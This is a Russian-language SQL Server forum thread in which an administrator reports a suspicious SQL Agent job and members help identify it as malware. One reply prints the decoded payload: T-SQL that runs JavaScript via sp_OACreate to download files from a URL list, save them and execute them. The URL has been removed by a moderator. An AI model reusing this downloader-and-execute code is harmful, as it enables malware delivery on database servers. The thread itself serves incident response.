Добро пожаловать в форум, Guest  >>   Войти | Регистрация | Поиск | Правила | В избранное | Подписаться
Все форумы / Microsoft SQL Server Новый топик    Ответить
 Обнаружил у себя на сервере не понятные задания  [new]
ssaich
Member

Откуда:
Сообщений: 1181
Имя задания - wexmly


Содержимое - выполнение вот такого скрипта
грешу на вирус ? (
declare @a varchar(8000);set 
@a=0xC7E4E5F1FC20E1FBEB204A6176612053637269707420F7E5F0E5E72073705F6F612E2E2E;--Virus ! exec(@a);


Модератор: Бинарь поменял, а то еще запустит кто


Сообщение было отредактировано: 16 мар 15, 17:26
16 мар 15, 15:52    [17390202]     Ответить | Цитировать Сообщить модератору
 Re: Обнаружил у себя на сервере не понятные задания  [new]
Glory
Member

Откуда:
Сообщений: 104760
DECLARE @js1 int;
EXEC sp_OACreate 'ScriptControl',@js1 OUT;
EXEC sp_OASetProperty @js1, 'Language', 'JavaScript1.1';
EXEC sp_OAMethod @js1, 'Eval', NULL, 'var url="здесь был очень вероятно малварный урл",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr[i].split("",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);'

Модератор: Урл убрал


Сообщение было отредактировано: 16 мар 15, 17:27
16 мар 15, 15:55    [17390218]     Ответить | Цитировать Сообщить модератору
 Re: Обнаружил у себя на сервере не понятные задания  [new]
Maxx
Member [скрыт]

Откуда:
Сообщений: 24290
классно у вас с правами однако
16 мар 15, 15:58    [17390228]     Ответить | Цитировать Сообщить модератору
 Re: Обнаружил у себя на сервере не понятные задания  [new]
ssaich
Member

Откуда:
Сообщений: 1181
Maxx,

служба Агента запускалась от имени Админа, под системной учеткой стартовать не хочет (говорит мне нечего делать),
все левые задания удалил, хлп!!!!
16 мар 15, 17:25    [17390838]     Ответить | Цитировать Сообщить модератору
 Re: Обнаружил у себя на сервере не понятные задания  [new]
Гавриленко Сергей Алексеевич
Member

Откуда: Moscow
Сообщений: 37069
Модератор: Скрипты отредактировал, чтобы никто не смог запустить


По сабжу - ищите, кто или что вам это подсадил, и наводите порядок с правами (если, конечно, фигачили не через проинжекченный процесс, что маловероятно).

Нехорошее это все.

Сообщение было отредактировано: 16 мар 15, 17:29
16 мар 15, 17:28    [17390862]     Ответить | Цитировать Сообщить модератору
 Re: Обнаружил у себя на сервере не понятные задания  [new]
ssaich
Member

Откуда:
Сообщений: 1181
ssaich,

Запустил, Агента - кто вкурсе что это был за вирус ?
16 мар 15, 17:31    [17390885]     Ответить | Цитировать Сообщить модератору
 Re: Обнаружил у себя на сервере не понятные задания  [new]
ssaich
Member

Откуда:
Сообщений: 1181
Сделал

exec sp_configure 'show advanced options', 1
reconfigure
go

exec sp_configure 'Agent XPs', 1
reconfigure
go

exec msdb..sp_get_sqlagent_properties


Но Агенту нечего делать, Планы обслуживания работать не будут, а настраивать службу "запуск из под админа" мне как то не оч охота
16 мар 15, 17:41    [17390954]     Ответить | Цитировать Сообщить модератору
 Re: Обнаружил у себя на сервере не понятные задания  [new]
SQL2008
Member

Откуда: Москва
Сообщений: 4262
ssaich
ssaich,

Запустил, Агента - кто вкурсе что это был за вирус ?

Админа не увольняли в недавнем прошлом?
16 мар 15, 18:07    [17391127]     Ответить | Цитировать Сообщить модератору
 Re: Обнаружил у себя на сервере не понятные задания  [new]
ssaich
Member

Откуда:
Сообщений: 1181
SQL2008
ssaich
ssaich,

Запустил, Агента - кто вкурсе что это был за вирус ?

Админа не увольняли в недавнем прошлом?



Думаете нагадил ?
17 мар 15, 12:23    [17393968]     Ответить | Цитировать Сообщить модератору
 Re: Обнаружил у себя на сервере не понятные задания  [new]
грешу на ви
Guest
ssaich,

главное всех во всем обвинять не спешите. есть следы - ок. нет следов - поправили и забыли. разосраться с человеком дело не хитрое.
17 мар 15, 12:37    [17394058]     Ответить | Цитировать Сообщить модератору
Все форумы / Microsoft SQL Server Ответить